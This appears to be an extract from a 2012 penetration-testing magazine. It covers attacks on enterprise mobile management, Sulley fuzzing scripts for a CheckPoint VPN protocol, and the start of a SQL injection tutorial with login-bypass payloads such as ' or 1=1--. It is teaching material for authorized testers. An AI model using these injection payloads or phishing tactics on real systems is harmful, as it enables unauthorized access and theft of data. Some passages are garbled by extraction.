application developer, I’ve been fortunate (I think) to their names are) is that almost without exception they
have been both, then you know a dirty not-so-secret all included some sort of enterprise app store though
they gave them various names. This
piqued my interest for several reasons
outside of just attack vectors though
having an app store front-end presents
us with the same vulnerabilities as
the management system’s admin
interface. This one is interesting
from a purely logistical perspective
because I’m curious who is doing
quality control on the apps getting
pushed out. Can anyone submit an
app? Most of the vendor website’s
weren’t very clear on this matter and
I was on a tight deadline. At any rate,
the workflow in these systems would
be very interesting to analyze. Like it
or not (I don’t particularly) but Apple’s
policy of app review before app store
submission probably catches most
malware. More companies should take
note for their enterprise mobile apps
and adopt a similar policy I think.

THE BEST OF 01/2012 Page 27 http://pentestmag.com


PENTEST REGULAR
At any rate, I think these enterprise app stores make This could be used to push out an update of your own
excellent points of attack if you can get them to do what ROM or firmware, etc. This is advanced attacking stuff
you want. That’s a lot of if’s because again I’m certain these and not something I would typically recommend as I
things are tested beyond normal industry standards, wait, suspect the other methods would work just fine. I would
they’re not? Of course not, it’s that dirty little not-so-secret use this one as sort of a last resort but it is a major
secret again, you can’t really restrict access to these app flaw I don’t see considered in most of these enterprise
stores since every phone has to have access (this is the management vendors. The provider influence might
hard part of true mobility) and they’re web applications, be the number one issue in the way of your mobile
once again, so same SQLi rules apply. This middle layer infrastructure security strategy. They tend to not like
provides another great entry into the infrastructure, again security much for reasons far beyond the scope of this
if you can get it to do what you want. article.

Attacking the Mobility Attacking the Proprietary


One aspect of this that I was initially trying to avoid but I and almost every security guy I know have pretty firmly
really can’t be is what I’ll call the provider influence. embraced Open Source software, again, for reasons
Most enterprises, and if you’re not sick of that word beyond the scope of this article. Simply put, a system
by the end of this article there is something wrong with must be able to be examined to be considered secure. It
you and I’ll tell you why at the end, choose a single has to stand up to scrutiny. Every mobile management
provider, in the US it’s Verizon, AT&T and a bunch of infrastructure I came across (I narrowed it down to three
others. An interesting attack vector involving the vendor initially for this article) proudly touted its proprietary
but is probably slightly harder would be an attack on nature as providing extra security. When I hear this as a
the provider’s Over-the-Air (OTA) update system. Again penetration tester I immediately start salivating, closed
unless you want to end up in prison this should remain systems that say things like we’re enterprise and closed
a proximity attack on known target you are authorized to so we’re better than everything else just get me going.
test and not attempted on the provider as a whole. I asked for demo copies from all three but all three said

THE BEST OF 01/2012 Page 28 http://pentestmag.com


they would be happy to give me a walk through but that
installable demoes weren’t available at this time. Again, References
a big red flag to me, especially when they all had a try it • The State of Mobile Malware [INFOGRAPHIC]: http://
mashable.com/2011/08/12/mobile-malware/
now button on their website. That’s what I get for being
• How To Hack a Mobile Phone: http://video.google.com/
honest I guess. Anyway, the point is when a vendor videoplay?docid=-8987396544207653068
touts their closed and proprietary nature and claims • The Keys to Successfully Managing Mobile Devices in
that as a feature you should usually run the other way Your Enterprise: http://maasters.maas360.com/forum/
screaming or buy something else. The funniest part of expertise/the-keys-to-successfully-managing-mobile-devi-
this is I had easy access to an installable trial copy of ces-in-your-enterprise/
• How Phone Hacking Worked and How to Make Su-
Exchange (the granddaddy of mobile management with re You’re not a Victim: http://nakedsecurity.sophos.com/
ActiveSync, etc) and people say Microsoft isn’t easy 2011/07/08/how-phone-hacking-worked/
to work with. Exchange wasn’t what I was looking for.
Moving on.
equipment. http://gitbrew.org/debdroid/ will show you
Attacking the Backend (of the user) the way. I plan to try this someday when I have some
So far we’ve attacked the front, back and various mid- mobile gear to spare but again I’m not really sure a
sections but we’ve left the so-called backend alone. mobile phone is beefy enough to handle some of the
Only because I feel that these sorts of fire bomb attacks tools folks use, we’ll see though.
in a penetration test is cheating because often they’re The bottom line when pen testing a mobile
too simple and involve very management infrastructure
little actual skill. All you need When a vendor touts their “closed and is to really stick with what
to do is trick the user into proprietary” nature and claims that as a feature you know and aim for the
installing a piece of custom you should usually run the other way screaming largest payoff. Don’t try to
software and bam, game
or buy something else. create some new hardware
over. Send them an email forged to be from their IT device plus write software for a two week engagement
director or boss, install this or you’ar fired or something when you can utilize a simple SQLi attack and own all
more eloquent, wait for them to ignore the permissions the mobiles in the enterprise. Simpler is usually better.
warning most phones give you and then sit back and Proprietary and closed systems usually make very rich
collect data. Sounds easy? It is, but it’s not much fun targets for simple attacks and that boys and girls is what
and it only proves that humans are often the weakest usually makes them enterprise. Enterprise is typically
link. Everyone knows that already, get a real job. Sorry, just another word for closed and as I’ve said they are
that’s just a pet peeve of mine. also usually very brittle systems that have not been
The key difference here is that often these mobile adequately scrutinized. If you have ever done one of
phones aren’t linked to any mobile management those penetration tests where the clients says now stay
infrastructure so you don’t have a choice in attack away from that system, it will crash if you just port scan
vectors, it has to be the phone. Users would mostly it, that system is usually considered Enterprise. Now go
never consider using their personal laptop for work forth and test the mobile world, let me know what types
but often they’ll choose to use a personal iPhone over of simple attacks worked for you and I’ll reprint them
a company provided BlackBerry (come on you would here (fully credited of course).
too) so as a result that iPhone isn’t the property of
the company and isn’t managed by IT. This creates a
management nightmare for sure and one that can be
driven home more sharply by a proper penetration test.
Imagine getting control of an iPad or phone that has
VPN access into a corporate network but is personally
owned by the user. That would probably turn a lot of BILL MATHEWS
executive heads and kick a mobile security program Bill Mathews is co-founder and
into high gear I would hope. lead geek of Hurricane Labs,
an information security �rm
Bonus: Using Your Smart Phone to Perform a founded in 2004. You can reach
Penetration Test Bill @billford on Twitter and be
I’m not terribly sure how practical this is but now you read other musings on http://
can even use your mobile phone as penetration test blog.hurricanelabs.com

THE BEST OF 01/2012 Page 29 http://pentestmag.com


PENTEST REGULAR

Fuzzing In a
Penetration Test
Protocol fuzzing has been a popular technique for bug discovery
with a number of tools, books and papers describing the benefits
and drawbacks. Although typically used for bug discovery in
a lab environment, there are opportunities to use fuzzing in a
penetration testing role too.

N
ot only does fuzzing in a penetration test give facing systems; in this particular case, it was an audit
your customer added value in an assessment requirement to have this level of testing done while
but it also services to expand your skill set and other people on my team got all the fun on the other
develop new opportunities for attacking and exploiting tasks.
systems. As expected, my reconnaissance and network scans
didn’t turn up a lot of interesting flaws, but I did have one
Background interesting target show up in the result of an Nmap scan
Not long ago, I drew the short straw on my team when as shown in Interesting ports on XXX.XX.XXX.2:. My target
divvying up responsibilities for a penetration test. While organization leveraged a CheckPoint server for remote
other people on the team got to target wireless flaws, VPN access, of which two ports were accessible.
web application flaws and the like, I got the external- The CheckPoint service running on TCP/264 piqued
facing network pen test task. my interest and after a little additional reconnaissance
You may have heard the drill before. The scope for my analysis I learned that it was used as an out-of-band
test included: communication channel by the CheckPoint VPN
client over a proprietary, unencrypted protocol called
• Externally accessible target systems SecuRemote.
• No client-side exploits The SecuRemote protocol is used to exchange
• No web app attacks information with the CheckPoint client, disclosing
• No external resource management attacks (such as certificate information and, following authentication
domain registration manipulation) from the client, network topology details. A few older
• No account enumeration/password guessing information disclosure vulnerabilities have been
attacks announced with public exploits, but the version my
customer was using was not vulnerable. However,
Try as we might convince people otherwise, some at this point I had some protocol documentation, a
organizations still request this type of testing and reference source and a fair amount of time remaining
hamper our typical approach to a pen test. Sometimes in my allotted analysis hours, with which I reasoned
this is because they really just want a pat on the that I could spend it doing some interesting protocol
back for doing a good job securing their externally- fuzzing.

THE BEST OF 01/2012 Page 30 http://pentestmag.com


file or even, in some esoteric cases, against complex
������ ��������������
hardware systems. By sending malformed data to
���������������� the target, we can evaluate the methods used by the
���������������� developer to validate input data, potentially identifying
crash conditions that could lead to an exploitable
����������������
vulnerability. In order to accurately characterize a
crash condition, however, we typically need to attach
�����������������������������
������������������� a debugger to the target process to capture stack
���������
��������������������� and register dump information, limiting fuzzing to a
local analysis technique and not something we would
Figure 1. SecuRemote Packet Exchange
typically use in a remote penetration test.
Not having a lot of options remaining for my external
The Role Of Fuzzing network analysis, I opted to talk to my customer about
In my classes with the SANS Institute, I talk about performing a remote fuzzing analysis against their
how fuzzing can be used for various analysis tasks by CheckPoint VPN service, targeting the SecuRemote
different groups including developers, QA engineers, protocol. My arguments were four-fold:
penetration testers and more. Typically, I would tell my
students that protocol fuzzing is not an attack, but rather • We could replicate local fuzzing against their
is a method we can use to identify vulnerabilities in a remote system and still obtain crashdump analysis
target system. However, I’m going to change my story information through the integrated CheckPoint
a bit here. technical support data collection vector.
When using protocol fuzzing, we typically target • We could perform our analysis during off-hours
a well-behaving piece of software, either a network (between midnight and 5am for the customer) to
service, client-side software reading from a malformed limit the impact of any system outages.

Listing 1. Nmap Target Scan Results

Interesting ports on XXX.XX.XXX.2:


PORT STATE SERVICE VERSION
264/tcp open fw1-topology Checkpoint FW1 Topology
500/tcp open isakmp?
Device type: general purpose|telecom-misc|firewall|WAP
Running (JUST GUESSING) : Linux 2.6.X|2.4.X (86%), Avaya Linux 2.6.X (85%), IPCop Linux 2.4.X (85%)
Aggressive OS guesses: Linux 2.6.24 (86%), Avaya Communication Manager (Linux 2.6.11) (85%), IPCop firewall
1.4.10 - 1.4.18 (Linux 2.4.31 - 2.4.34) (85%), OpenWrt (Linux 2.4.32) (85%), Linux 2.6.24
(Gentoo) (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Device: firewall

Listing 2. Topology Request Data

0000000: 4100 0000 0259 0521 0000 0004 c41e 4352 A....Y.!......CR
0000010: 0000 004e 2874 6f70 6f6c 6f67 792d 7265 ...N(topology-re
0000020: 7175 6573 7a40 a093 a636 16e6 16d6 5202 quesz@...6....R.
0000030: 82d5 3656 e736 5506 f737 42d6 46f7 4636 ..6V.6U..7B.F.F6
0000040: f6d2 d290 a0a93 a636 861a 6c6c 656e 6765 .......6..llenge
0000050: 2028 6332 6532 3331 3833 3964 3066 290a (c2e231839d0f).
0000060: 290a 00 )..

Listing 3. Sulley Installation

$ svn checkout http://sulley.googlecode.com/svn/trunk/ sulley

THE BEST OF 01/2012 Page 31 http://pentestmag.com


PENTEST REGULAR
• Since the customer had to expose this service for information from earlier versions of CheckPoint VPN
CheckPoint VPN client users, there was value in servers at http://www.securiteam.com/securitynews/
evaluating it for flaws as a potential exploitation 5HP0D2A4UC.html.
vector. In this example we see a fair amount of string
• The analysis could give the customer some visibility information, possibly a static hash value, a configuration
into the threat of 0-day vulnerabilities within the verb string topology-requesz, and a lot of unknown
scope of their imposed engagement rules. fields. Again here we can spot some length fields
followed by corresponding data, such as the \x00\x00\
After coordinating with their internal support and x00\x04 on the first line followed by the 4-byte value
networking teams, my customer was happy to indulge ending \xc4\x1e\x43\x52. This pattern appears to repeat
us in this analysis step. Next, I had to whip up a series at the beginning of the next line with the length value
of test cases to evaluate the target service. \x00\x00\x00\x4e followed by 78 bytes of data prior to a
trailing NULL byte.
Protocol Analysis While there is no simple way we can identify the
Prior to engaging in a fuzzing test, it is important to meaning behind some of the bitwise fields, we can
understand the portions of the protocol you will be identify several interesting fuzzing targets from this
evaluating. Since the SecuRemote protocol is not analysis:
documented by CheckPoint, and to my knowledge has
not been publicly reverse-engineered, I needed to dig • Four-byte length fields: anytime you identify a
into some packet captures for my analysis. length indicator in a protocol, fuzz it. Any assumed
A quick Google search turned up several sample limitations on user-supplied data should be tested
packet captures posted by other organizations with length fields of various quantities.
while searching for assistance in troubleshooting or • Several static bit-wise fields consisting mostly
associated with prior vulnerabilities no longer an issue of \x00 values, giving us the opportunity to limit
for my target. Looking through these packet captures, I our fuzzing while enumerating alternate bitwise
was able to glean some details as to the working of the combinations.
SecuRemote protocol, shown in Figure 1. • Regular use of NULL terminators at the end of
After the 3-way handshake, the CheckPoint VPN strings. Though the recipient parser does not have
client sends two small packets with 4-byte payloads. to rely on NULL terminators since field length
This packet content appears to be consistent for a given values are also used, it’s a good idea to see what
CheckPoint server and client, though some variations in happens to a parser when terminator fields are no
the leading byte of the first packet were noted, possibly longer present.
indicating a version indicator of some kind.
After the second packet from the client, the server With this knowledge, I started to prepare my test cases
returns a 4-byte packet payload, similar to the first to deliver to the target system.
packet from the client with one additional set bit.
The fourth packet sends the string securemote to Tool Selection
the VPN server, with four leading bytes and one NULL In examining the protocol and selecting interesting
termination byte at the end of the string. The leading fields for analysis with our fuzzer, I’ve steered my
bytes likely indicate a 4-byte big-endian length value, analysis technique toward the use of an intelligent
since 0x0b correlates to the length of the string with the mutation fuzzer. While other fuzzing techniques are
addition of the string terminator. certainly an option, such as randomized fuzzing and
After the fourth packet the server responds with simple mutation fuzzers such as TaoF (http://sf.net/
the familiar leading 4-byte length indicator, followed projects/taof), mutation fuzzing gives us a good
by a string that appears to disclose human-readable balance of control over what is being evaluated, a finite
certificate information revealing the server common analysis runtime and rapid test case development, all
name (CN=) and organization name (O=). essential components for an analyst using fuzzing in a
Additional data is sent from the server, likely the penetration test environment.
continuation of certification information, followed by My preference in an intelligent mutation fuzzer is
several instances of none\x00 with a leading 5-byte length Sulley, the Python framework written by Pedram Amini.
indicator sent by the client. One additional frame of Sadly, Pedram has not continued to maintain Sulley, but
interest is shown in Listing 2, generated with an exploit with minor fixes we can still make use of this framework
tool published to retrieve internal network topology using recent Python 2.X releases. An alternative option

THE BEST OF 01/2012 Page 32 http://pentestmag.com


Listing 4. Embellished Sulley Fuzzer Targeting Initial Client Packet

#!/usr/bin/env python
# Fuzzing the initial 4-byte packet from client to CheckPoint VPN server.
import time
import sys
from sulley import *

# Time to wait between mutations


SLEEP_TIME=0.5
# Time to wait before claiming a host is unresponsive
TIMEOUT=3
# number of crashes to observe before skipping the remainder of a group
CRASH_THRESHOLD=3

# Initialize the Sulley mutation descriptor


s_initialize("SecuRemote-Initial-Packet")

s_byte("\x51",full_range=True)
s_static("\x00\x00\x00")

print "Total mutations: " + str(s_num_mutations()) + "\n"


print "Minimum time for execution: " + str(round(((s_num_mutations() *

print "Press CTRL/C to cancel in ",


for i in range(5):
print str(5 - i) + " ",
sys.stdout.flush()
time.sleep(1)

# For debugging purposes, uncomment these lines to see Sulley's mutations


# in hex dump format
#print "Hex dump mutation output:"
#while s_mutate():
# print s_hex_dump(s_render())

sess = sessions.session(session_filename="SecuRemote-Initial-Packet.sess", sleep_time=SLEEP_TIME,


timeout=TIMEOUT, crash_threshold=CRASH_THRESHOLD)

# Tie this session to the SecuRemote-Simple-String fuzzing cases


sess.connect(s_get("SecuRemote-Initial-Packet"))

# Change this IP address to the target system


target = sessions.target("127.0.0.1", 264)

# Add the target to the session (can be repeated for multiple targets)
sess.add_target(target)

# Kick off the fuzzer, monitoring with WebUI on localhost:26000


sess.fuzz()

THE BEST OF 01/2012 Page 33 http://pentestmag.com


PENTEST REGULAR
Listing 5. Minimal Sulley Fuzzer Targeting the "securemote" Client Packet

#!/usr/bin/env python
from sulley import *
SLEEP_TIME=0.5
TIMEOUT=3
CRASH_THRESHOLD=3

# The function Sulley will run prior to sending each mutation. We leverage
# it to setup the target system with the initial packets and response in the
# protocol exchange prior to our target packet.
def preconn(sock):
sock.send("\x51\x00\x00\x00")
time.sleep(0.5)
sock.send("\x00\x00\x00\x21")

# Set a socket timeout on the recv so we aren't waiting indefinitely if


# the server crashed from a previous test case.
sock.settimeout(5)
response = sock.recv(4)
print "Setup response: ",
for i in response:
print "%02x" % ord(i),
print

s_initialize("SecuRemote-Simple-String")

# Create a size field, which is based on the content of the named block
# Sulley uses ">" to indicate big-endian values, "<" is little-endian
s_size("client-name-string", length=4, endian=">")

# This is the block of data used for filling in the s_size


if s_block_start("client-name-string"):
# "securemote" is the default string
s_string("securemote")
# constant null terminator
s_byte("\x00")
s_block_end()

sess = sessions.session(session_filename="Securemote-Simple-string.sess", sleep_time=SLEEP_TIME, timeout=TIMEOUT,


crash_threshold=CRASH_THRESHOLD)

# Call preconn() before each mutation is sent to setup the target


sess.pre_send = preconn

sess.connect(s_get("SecuRemote-Simple-String"))
target = sessions.target("127.0.0.1", 264)
sess.add_target(target)
sess.fuzz()

THE BEST OF 01/2012 Page 34 http://pentestmag.com


for a mutation fuzzer is the Peach framework, though
I prefer the Python syntax over XML development
leveraged by Peach, plus we’ll take advantage of native
Python code to enhance our fuzzing test cases.
To install Sulley, check out the source from the project
site using the Subversion tool, as shown in Listing 3.
With Sulley we use basic data type constructs to
describe how a packet is put together, identifying
the presence of string-based fields, numeric fields of
various widths, delimiters and static values. All specified
fields are iteratively mutated with intelligent mutation
values (with the exception of static fields, which are not
mutated), allowing you to test for target flaws. Sulley
also gives us some advanced functionality to describe
complex protocols that involve checksums and complex
data elements that are best described in the project
documentation.
Listing 4 is an embellished Sulley fuzzer targeting
the initial 4-byte packet payload from the client. This
script uses a few Python embellishments to estimate
runtime to give me a chance to kill the fuzzer before
it starts with [CTRL+C]. In this script, I used Sulley’s
one-byte numerical field identifier s_byte() to target the
leading byte of the 4-byte payload, followed by a static
definition of the three NULL bytes. I added the full_
range=True modifier here to tell Sulley to iterate through
all 256 values instead of catching the border cases of
low and high values as well as common divisors (values
divisible by 3, 4, 32, etc.) Copy this script to your Sulley
directory and invoke it to start the fuzzer.
Unfortunately, this initial run didn’t uncover any
interesting crashes against the target, though it did
periodically generate varying responses from the
server. In order to more thoroughly evaluate the target
system, the fuzzer needed to accommodate some
target protocol state.

Fuzzing Stateful Protocols


When designing a fuzzer, if the first packet in the
protocol exchange is all you are targeting then you
will miss some interesting vulnerability opportunities.
Many fuzzers do not accommodate the more complex
subsequent packets in a protocol exchange since they
require the developer to accommodate some stateful
awareness in the fuzzer that can manipulate the target
with well-formed packets prior to sending the malformed
content.
In the case of the SecuRemote protocol, the first two
packets from the client to the VPN server were fairly
uninteresting. The fourth packet in the exchange from
the client, however, includes an interesting string and
length indicator followed by a NULL byte terminator.
In order to evaluate how the VPN server reacts to

THE BEST OF 01/2012


PENTEST REGULAR
malformed data in this step of the protocol exchange, Sulley stdout redirection to the tee utility and the Simple
we need to complete the earlier two 4-byte packets, and Watcher Perl script (swatch.pl). Our analysis indicated
ensure we obtain the expected response from the VPN that we did trigger a small number of minor DoS events
server in step 3. on the VPN server which were automatically rectified by
Fortunately, Sulley gives us a simple setup option the CheckPoint server and a service automatic restart
that we can extend with a little Python scripting. Prior function.
to delivering each mutated test case, Sulley will check When reporting the findings to our customer, they
for a callback function defined in the session with the were pleased on two fronts:
name pre_send. In this callback function, Sulley passes
the socket handle for the mutated session (immediately • Our analysis allowed the customer’s security team
following the three-way handshake). By defining our to reinforce their internal mantra: nothing is perfect
own Python callback function, we can read and write in security, helping them voice the continued need
to this socket as needed to send the initial two 4-byte for defense-in-depth protections on their internal
packets, and ensure we get a response from the server network.
before allowing Sulley to send the mutated packet. • They had a simple mechanism with which to
The data we are manipulating in packet 4 of the communicate the flaws to CheckPoint and to
exchange adds a bit of complexity in the design of our validate subsequent fixes.
fuzzer. We want to have Sulley generate large and small
strings where the securemote string normally is, but we The customer was happy with the analysis results, and
need to preserve the prior length field to accurately I felt as though I was able to deliver more value to the
reflect the length of our mutated string value. We could customer than an external penetration test report that
place a fixed value in the length field regardless of the would otherwise have identified no vulnerabilities.
length of the mutated string, but this might be rejected
with basic error validation procedures on the server, Conclusion
preventing us from reaching code that could otherwise In this article, we’ve only touched on the functionality
trigger a fault on the target system. of Sulley, leveraging it in an atypical manner. When
Sulley accommodates the ability to include length fuzzing a target process on a Windows box such as a
fields with the s_size() construct. Using Sulley, we web server or other socket listener, Sulley can attach to
define a Python block beginning with an empty if the target process to capture register and stack trace
statement and the Sulley s_block_start() construct. All information, create packet captures for each mutation
the fields that are accumulated to reflect the length of sent, and even remotely control a VMware system
the s_size() field are included in the block, followed by s_ to revert a target process to a snapshot following a
block_end(). When defining s_block_start(), we name the crash to reset the target environment. Combined with
block of fields, and reference it in the s_size() construct the ability to leverage Python to enhance my fuzzing
prior to or after the block definition, as needed. routines, it fits my needs for everything from simple to
In our case, we need to reference the mutated string complex tests that can be put together in short order.
length and the NULL terminator field in our s_size() As an IDS analyst, I would not expect to see a flurry of
block, as shown in Listing 5. This example is more of a fuzzing activity targeting my externally-facing systems,
minimal Sulley script, for brevity, but can be combined unless the attacker were only pursuing a DoS attack
with the extra embellishments of Listing 5 if desired. opportunity. Fuzzing is still primarily a local analysis
Continuing our development, we can leverage a activity where flaws are evaluated with an eye toward
similar stateful manipulation technique to test the exploit development. However, as penetration testers,
server’s reaction to malformed network topology we should not rule out the option of using fuzzing in a
requests. The network topology request is a much more penetration test where it makes sense to do so.
interesting data set from a fuzzing perspective, with
several additional field manipulation opportunities. This
script is available at http://www.willhackforsushi.com/ JOSHUA WRIGHT
code/securemote-ptm.py. Joshua Wright is a senior instructor with
the SANS Institute. Josh’s papers, tools and
Value In Pen-test Fuzzing articles are available at
In our engagement, we ran the fuzzers against the www.willhackforsushi.com.
CheckPoint VPN server over the course of several
nights, monitoring the results with a combination of

THE BEST OF 01/2012 Page 36 http://pentestmag.com


Global I.T. Security Training & Consulting

www.mile2.com

IS YOUR NETWORK SECURE?


������������������������������������������������������������
��
����������������������������������������������������������������
�����������������������������������������������������������
������������������������������������������������������ mile2 Boot Camps

A Network breach...
Could cost your Job!

Available Training Formats


�� ���� ������������������������
� � ������������������������� ��� ���� ��������������
������� � ����������������� ��� ���� ��������������������
�������� � ������������������������������������������� ��������� ������������������
������ � ���������������������������������� ��� ���� ����������������������������
������ � ����������������������������������������������

�������������������
� � ����������������������������������������� Other New Courses!!
�������� � ������������������������������������� ���� ���������������������
��������� � ��������������������������������������� �������� �������������������
���� �����������
� � ����������������������
�������� � ������������������������������� ���������� ���������������������������
��������� ���������������������������
� � �������������������������� ���������� ��������������������������
������� �����������������������������������
��������� ��������������������������������������������������
�����������������
��������������� �������������
INFORMATION ASSURANCE
������� � ������������������������������������������������ SERVICES
����������������������������������������
��� �������������������
������������������������������
��� �������������������������
��������� � ���������������������������������������� ��� �������������������������������������
��� ��������������
� � ����������������� ��������������������������������������������
�������� � �����������������������������������
(ISC)2 & CISSP are service marks of the IISSCC. Inc. Security+ is a trade mark of ��������������
CompTIA. ITIL is a trade mark of OGC.GSLC & GCIH are trademarks of GIAC. ���������������
11928 Sheldon Rd Tampa, FL 33626
PENTEST REGULAR

SQL Injection: Inject


Your Way to Success
SELECT * FROM winners WHERE pentester = ‘YOU’ or 1=1--’
SQL Injection is one of the many web attack mechanisms used
by hackers to steal data from organizations. SQL Injection is one
of the most common vulnerabilities in web applications today.
It is (as of the time of writing) ranked as the top web application
security risk by OWASP[1].

D
atabases are the backbone of most commercial a myriad of user submit able forms and the delivery of
websites on the internet today. They store dynamic web content. Many of these features users take
the data that is delivered to website visitors for granted and demand in modern websites to provide
(including customers, suppliers, employees, and businesses with the ability to communicate customers.
business partners). Backend databases contain lots These website features are may be susceptible to SQL
of juicy information that an attacker may be interested Injection attacks and are good place to start during a
in. Data such as: User credentials, PII, PII, confidential pentest engagement that includes a web application
company information, and anything other data that a testing component.
legitimate user may need access to through a web
portal. At its most basic form, web applications allow A Simple SQL Injection Example
legitimate website visitors to submit and retrieve Take a simple login page where a legitimate user would
data over the Internet using nothing more than a enter his username and password combination to enter
web browser which allow the internet to be the giant a secure area to view his personal details or upload his
consumer market that it is. comments in a forum.
SQL Injection is the attack technique which When the legitimate user submits their information,
attempts to pass SQL commands through a web a SQL query is generated from this information and
application for execution by the backend database. submitted to the database for verification. The web
If not sanitized properly, web applications may result application in question that controls authentication
in SQL Injection attacks that allow hackers to view will communicate with the backend database through
or modify information from the database. The attack a series of commands to verify the username and
tries to convince the application to run SQL code password combination that was submitted. Once
that will result in access that was not intended by verified, the legitimate user should be granted the
the application developers. The attacker uses SQL appropriate access for their account to the web
queries and creativity to bypass typical controls that application.
have been put in place. Through SQL Injection, the attacker may input
Common web application features introduce the SQL specifically crafted SQL commands with the intent of
injection attack vector. These features include login bypassing the login form authentication mechanism.
pages, search pages, e-commerce checkout systems, This is only possible if the inputs are not properly

THE BEST OF 01/2012 Page 38 http://pentestmag.com


Listing 1. SQL comparison

Normal SQL activity: SELECT * FROM users WHERE username = 'SiteAdmin'


SQL Injection activity: SELECT * FROM users WHERE username = '' OR 1''

Listing 2. Expected SQL Command

SELECT count(*) FROM users_list_table WHERE username=’FIELD_USERNAME’ AND password=’FIELD_PASSWORD"

sanitized and sent directly with the SQL query to the commands planned for the web application may look
database. SQL Injection vulnerabilities provide the something like the SQL query in Listing 2.
means for a hacker to communicate directly to the The SQL command from Figure 2 instructs the
database. As you see in Listing 1, typical SQL activity backend database to check the username and password
and SQL Injection activity is very similar. input by the user user to the combination it has stored
Normal SQL activity will work as expected. The web in the database. If they match the user is authenticated
application will ask the database to select everything and granted access to the web application. Of course
from the users table that has a username equal to this is a simplistic description, but you get the idea.
SiteAdmin. However, the SQL Injection activity will Web applications are coded with specific SQL
cause our backend database to misbehave. The SQL queries that it will execute when performing functions
Injection query by using a single quote will terminate the and communicating with the backend database. If not
string part of the database query, * username = ‘ ‘, and properly sanitized the web application can be coerced
then added on to our WHERE statement with an OR into running additional SQL commands that were not
clause of 1, * username = ‘ ‘ OR 1. intended.
This OR clause of 1 will always be true and so every An attacker will be able to extract and modify the
single entry in the customers table would be selected by data stored in the backend database without having to
this statement! penetrate the database server itself, bypassing all of the
The technologies vulnerable to this attack are perimeter defenses that may be in place.
dynamic script languages, including ASP, PHP, JSP,
and CGI. All an attacker needs to perform an SQL Finding SQL Injection and more examples
Injection hacking attack is a web browser, knowledge of Finding SQL Injection vulnerabilities is simple. Look
SQL queries and creative guess work to figure out table for any web page that contains a user input box. For
and field names. narrowly scoped pentest engagements this should be
It possible to pass SQL queries directly to a database easy to do. Also look for pages like ASP, JSP, CGI,
that is protected by a firewall because it is open to the or PHP web pages. Try to look especially for URL
internet and in order for it to function correctly security that takes parameters, like: http://somesite.com/
mechanisms will allow public web traffic to communicate home.asp?id=3.
with your web application over expected web ports. The
web application must have open access to the database
in order to return the requested information.
SQL or Structured Query Language is the computer
language that allows you to store, manipulate, and
retrieve data stored in a relational database (or a
collection of tables which organise and structure data).
SQL is, in fact, the only way that a web application (and
users) can interact with the database. Examples of
relational databases include Oracle, Microsoft Access,
MS SQL Server, and MySQL, all of which use SQL as
their basic foundation.
SQL commands include SELECT, INSERT, DELETE,
DROP TABLE, UNION and many more. In the legitimate
scenario of the login page example above, the SQL Figure 1. Google Hacking

THE BEST OF 01/2012 Page 39 http://pentestmag.com


PENTEST REGULAR
Additionally, remember Google is your friend. The use To test for SQL Injection vulnerability we add a
of Google hacking techniques, make finding potentially single quote to the end of the URL like this: http://
vulnerable web pages simple. Google Hacking is described somesite.com/home.asp?id=3’.
by Johnny Long, Ed Skoudis, and Alrik van Eijkelenborg in Once we submit this URL the resulting response will
their book Google Hacking for Penetration Testers. One tell us all we need to know. Any type of error which
of my favorite searches is: inURL:index.asp?id=. Simply is related to a SQL query, such as You have an error
remove the double quotes and enter that line into Google in your SQL syntax, indicates that the web page is
and watch the magic, of course you should also change vulnerable to SQL injection. If the page remains in same
the URL to match that of your assessment engagement page or showing that page not found or showing some
scope. Here in Figure 1 you see Google returned about 60 other non SQL related response then we can assume
million results from the above search. the page is not vulnerable to SQL Injection.
So in my example our target web page has the URL Start with a single quote trick. Input something like test’
http://somesite.com/home.asp?id=3. or 1=1— into the login, password, or website URL. As in:

Listing 3. Web Page Source Code

</style>
</head>
<body>
<div class="wrapper">
<div class="google-header-bar">

<div class="header content clearfix">


<a id="link-google" href="http://www.google.com/" >
<img class="logo" src="//www.google.com/images/logos/google_logo_41.png" alt="Google">
</a>
<span class="signup-button">
New to Gmail?
<a id="link-signup" class="g-button g-button-red" href="http://mail.google.com/mail/signup">
Create an account
</a>
</span>

</div>
</div>
<div class="main content clearfix">
<div class="sign-in">
<div class="signin-box">
<h2>Sign in <strong></strong></h2>
<form id="gaia_loginform" action="https://accounts.google.com/ServiceLoginAuth" method="post">
<input type="hidden"

name="continue" id="continue" value="https://mail.google.com/mail/?hl=en&amp;tab=wm"

>
<input type="hidden"

name="service" id="service" value="mail"

THE BEST OF 01/2012 Page 40 http://pentestmag.com


• Login: test’ or 1=1--
• Pass: test’ or 1=1--
• http://somesite.com/home.asp?id=test’ or 1=1--

If you have to work with hidden fields, the simplest


solution is to download the source HTML’ as seen in
Figure 1, from the site, save it in your hard disk, modify
the URL and hidden field accordingly. Example:

<FORM action=http://somesite.com/Search/search.asp
method=post>
<input type=hidden name=A value=”test’ or 1=1--”>
</FORM>

If the site is vulnerable and the first user account in


the database is active, you will login without any login
name or password needed. It’s almost too easy.
Let us look at another example why ‘ or 1=1-- is
important. Other than bypassing login, it is also possible
to view extra information that is not normally available.
Take an asp page that will link you to another page with
the URL http://somesite.com/home.asp?category=CCn
umbers.
In the URL, category is the variable name, and
CCnumbers is the value assigned to the variable. The
ASP may contain the following code in order to perform
that function:

v_cat = request(„category”)
sqlstr=”SELECT * FROM sensitivedata WHERE PCategory=’”
& v_cat & „’”
set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v _ cat


and thus the SQL statement should become:

SELECT * FROM sensitivedata WHERE PCategory=’CCnumbers’

The SQL Injection query should return results


containing one or more rows that match the WHERE
condition, in this case, CCnumbers. Now, assume that
we change the URL into something like this:

http://somesite.com/home.asp?category=CCnumbers’ or 1=1--

Now, our variable v _ cat equals to CCnumbers’ or 1=1--, if


we substitute this in the SQL query, we will have:

SELECT * FROM sensitivedata WHERE PCategory=’CCnumbers’


or 1=1--’

The SQL Injection query now should now select


everything from the sensitivedata table regardless if

THE BEST OF 01/2012


PENTEST REGULAR
PCategory is equal to CCnumbers or not. A double If the variables $username and $password are requested
dash -- tells SQL server ignore the rest of the query directly from the user’s input, this can easily be
as it is just a comment, which will get rid of the last compromised. Suppose that we gave Mike as a
hanging single quote. However, you may be able to username and provided anything OR ‘x’=’x as a
simply ignore the rest of the query. Depending on what password. That would look like this:
type of backend database server you are dealing with
you also may try: SELECT id FROM logins WHERE username = ‘Mike’
AND password = ‘anything’ OR ‘x’=’x’
‘ or ‘a’=’a
As the inputs of the web application are not properly
The SQL Injection query will now become: sanitized, the use of the single quotes has turned the
